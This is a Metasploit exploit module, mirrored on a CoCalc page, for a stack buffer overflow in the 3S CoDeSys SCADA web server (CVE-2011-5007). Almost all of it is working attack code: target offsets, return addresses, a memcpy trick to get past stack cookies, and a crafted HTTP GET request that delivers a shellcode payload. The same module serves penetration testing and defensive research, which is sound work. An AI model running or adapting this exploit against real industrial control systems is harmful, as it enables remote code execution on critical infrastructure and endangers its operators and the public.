CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'            => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',

14
      'Description'     => %q{

15
        This module exploits a remote stack buffer overflow vulnerability in

16
        3S-Smart Software Solutions product CoDeSys Scada Web Server Version

17
        1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and

18
        earlier.

19
      },

20
      'License'         => MSF_LICENSE,

21
      'Author'          =>

22
        [

23
          'Luigi Auriemma', # Original discovery and poc

24
          'Celil UNUVER',

25
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit

26
          'sinn3r',

27
          'Michael Coppola'

28
        ],

29
      'References'      =>

30
        [

31
          [ 'CVE', '2011-5007'],

32
          [ 'OSVDB', '77387'],

33
          [ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],

34
          [ 'EDB', '18187' ],

35
          [ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],

36
          # The following clearifies why two people are credited for the discovery

37
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']

38
        ],

39
      'DefaultOptions'  =>

40
        {

41
          'EXITFUNC' => 'process',

42
          'DisablePayloadHandler' => false

43
        },

44
      'Platform'        => 'win',

45
      'Payload'         =>

46
        {

47
          'size'     => 650,

48
          'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",

49
        },

50


51
      'Targets'         =>

52
        [

53
          [

54
            'CoDeSys v2.3 on Windows XP SP3',

55
            {

56
              'Ret'    => 0x7E4456F7, # jmp esp user32

57
              'Offset' => 775

58
            }

59
          ],

60
          [

61
            'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',

62
            {

63
              # Abuse a memcpy() call to circumvent stack cookies

64
              'Offset' => 525,

65
              'Ret'    => 0x02CDFD68,

66
              'Src'    => 0x02CDFD58,

67
              'Dest'   => 0x02CDFA14

68
            }

69
          ],

70
        ],

71
      'Privileged'     => false,

72
      'DisclosureDate' => '2011-12-02'

73
    ))

74


75
    register_options([Opt::RPORT(8080)])

76
  end

77


78
  def check

79
    connect

80
    sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")

81
    res = sock.get_once

82
    disconnect

83


84
    # Can't flag the web server as vulnerable, because it doesn't

85
    # give us a version

86
    vprint_line(res.to_s)

87
    if res.to_s =~ /3S_WebServer/

88
      return Exploit::CheckCode::Detected

89
    else

90
      return Exploit::CheckCode::Safe

91
    end

92
  end

93


94
  def exploit

95
    connect

96


97
    if target.name =~ /v2\.3/

98
      buffer =  rand_text(target['Offset'])

99
      buffer << [target.ret].pack('V')

100
      buffer << make_nops(8)

101
      buffer << payload.encoded

102


103
    else

104
      # CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3

105
      buffer =  rand_text_alphanumeric(target['Offset'])

106
      buffer << [target.ret].pack('V')

107
      buffer << [target['Src']].pack('V')

108
      buffer << [target['Dest']].pack('V')

109
      buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison

110
      buffer << make_nops(8)

111
      buffer << payload.encoded

112
      buffer << "\\a"

113
    end

114


115
    sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

116


117
    print_status("Trying target #{target.name}...")

118
    sock.put(sploit)

119
    res = sock.get_once(-1, 5)

120
    print_line(res) unless res.nil?

121


122
    handler

123
    disconnect

124
  end

125
end

126


127
=begin

128
target.ret verified on:

129
- Win XP SP3 unpatched

130
- Win XP SP3 fully-patched

131
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed

132
=end

133


134